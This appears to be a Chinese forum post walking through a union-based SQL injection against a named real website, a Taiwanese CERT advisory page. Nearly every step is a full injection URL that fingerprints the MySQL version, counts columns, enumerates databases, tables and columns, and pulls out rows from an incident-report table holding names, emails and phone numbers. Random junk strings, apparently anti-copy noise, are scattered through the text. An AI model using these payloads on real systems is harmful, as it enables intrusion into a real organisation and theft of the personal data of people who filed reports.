1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
- f4 p8 v# j! T3 u7 T2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解# { \- J4 |( ]0 o# Z7 X. j
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--- J3 h" p0 M* x' Y; s* \/ J) i
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
- @! u0 N3 ~) T4 O$ C3 \数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。! q1 m% C' S) N( D A, C
4.判断有没有写权限
# V: Z8 b" M4 B, F' Uhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限% N( c2 J Y/ U
没办法,手动猜表啦1 i! }( N9 q% _+ W# m& h b8 {/ L) B
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
6 O7 i! w- o7 f! n但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下6 e2 e! F) h7 B) F& y3 ?: b5 O
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) J9 L M2 H( D7 f
成功查出所有数据库,国外的黑客就是不一般。数据库如下:6 O |1 p5 F$ @. h$ M, a+ \
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb1 V* v$ @6 L7 [6 c% E
6.爆表,爆的是twcert库
5 X, m# |1 P, v/ D# a0 uhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
$ T1 R* q/ S* [; l爆出如下表" j& a9 Y4 d' ]& G! x
downloadfile,irsys,newsdata,secrpt,secrpt_big5
5 U) U3 K. c( b7 ]9 p4 n- _' G8 U7.爆列名,这次爆的是irsys表
0 F8 v) Y# w$ H1 W* T3 M ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--' [0 M' _2 U5 w- E5 Q8 B
爆出如下列
) Y/ @* I! o5 r8 Y6 k! yir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status! u, F+ i8 `2 J& _% ?, E/ m
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
r: J* i2 b9 C% k, [9 e7 d, l$ shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--2 c- u; X7 h6 b- t K' i3 u0 W3 Z' h" ]
返回是3,说明每个列里有3个地段; D* D+ C9 V. ]# n% n7 x3 D- ^
9.爆字段内容
: V) k( [ u" M5 U$ B% m8 p3 hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--0 d. p! _# Q: B- o4 A' I" p
爆出name列的第一个字段的内容! P+ ?+ N( |* M9 U" R' p# L0 M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
" Q7 M" r0 t/ { x+ @- f爆出name列的第二个字段的内容 |